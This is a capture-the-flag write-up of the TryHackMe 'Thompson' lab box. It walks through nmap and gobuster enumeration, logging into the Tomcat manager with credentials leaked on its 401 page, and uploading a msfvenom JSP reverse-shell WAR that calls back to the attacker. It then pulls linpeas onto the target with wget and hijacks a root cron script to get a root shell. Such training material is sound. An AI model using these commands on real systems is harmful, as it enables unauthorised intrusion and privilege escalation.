Tryhackme Write-up — Thompson
A beginner level easy Capture The Flag(CTF) that challenges beginners to solve variety of tasks using available tools and hacking into a server to steal data. In this post, a course task from HackerU : RED Team Pentester, I will show the steps followed to get the flag.
Basic Checks to be performed before attacking the machine.
1.Power on the Target Machine and make a note of the IP address.
2.Start your Kali Virtual Machine.
3.Connect to TRY HACK ME OPEN VPN
Step 1
NMAP (NETWORK MAP) -Enumeration
Let’s start with nmap scan
-A:aggressive scan :basically it runs scripts for common things so you can better understand what you can find useful and what is useless.
sV :version detection:great for searching exploits related to that version of the running services
Pn:Treat all hosts as online:skip host discovery
sC: equivalent to script=default
You can type “man nmap” view summary options.
The box is running apache tomcat on port 8080. Now let’s open it in our web browser.
Two others ports are open ssh and port 8009.
You get the Apache Tomcat default page. View page source you can the directories listed and traditonally will see the same directories if gobuster directory search tool is used and dependent on the worldlist. Let us start with gobuster scan
The directory search returns directory than can be explored more. Tomcat default Manager when opend in browser prompts for an username and password. Try some default credentials and nothing works. When you click on the cancel button , nice way of putting the username and password in the 401 page.
When you enter the credentials , you will be able to access the Tomcat Application Manager. As you scroll the page you can find that there is an option to upload a payload and gain access to the system.
How do we know what payload to create and upload.If you look at the directory /examples you can find jsp samples. We can create a msfvenom with jsp as payload and upload to gain initial access.
Command
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war
Switches used:
-p Determine the payload that is to be used
-f Determine the output file type
LHOST IP where the victim machine should connect (Attacker’s IP address)
LPORT Port on which the victim machine should connect (Where attacker would be listening)
You can find the payload revese uploaded in the Tomcat App Manager Screen. Let us open a netcat session in Kali Attacker Machine and click on the reverse payload.
Steady the shell by entering the commands as shown
From the above commands you can find who is the current user and id for that user. Navigate to the home directory and the first flag is captured.
The next task is to obtain the root flag that is privilege escalation.In the home diretory of jack folder you can find two files. One is id.sh and test.txt. The test.txt content is being executed as root and id.sh is being executed as jack.
Upload favourite linpeas.sh from attacker machine to target machine.
Navigate to the linpeas directory.
Locate the file linpeas.sh
python3 -m http.server 9000
Go to the Target Machine IP . Navigate to cd /dev/shm or tmp folder in case permission issues in the home folder.
In the terminal enter
“wget http://<Attacker Machine IP>:<Port>/linpeas.sh”
Set permission to linpeas.sh “chmod +x linpeas.sh”
Execute the command and write to an output always.
./linpeas.sh > linpeas.log
Open the log using any text editor and you can see that id.sh is schduled to run every minute.
Replace the id.sh with the following command. Make sure the quotes or special characters are not omitted.
Start a netcat session in Kali Attacker Machine and wait for a minute for the crontab to be executed. We drop in as root and capture the root flag.
Thank you this writeup. Hope you understood.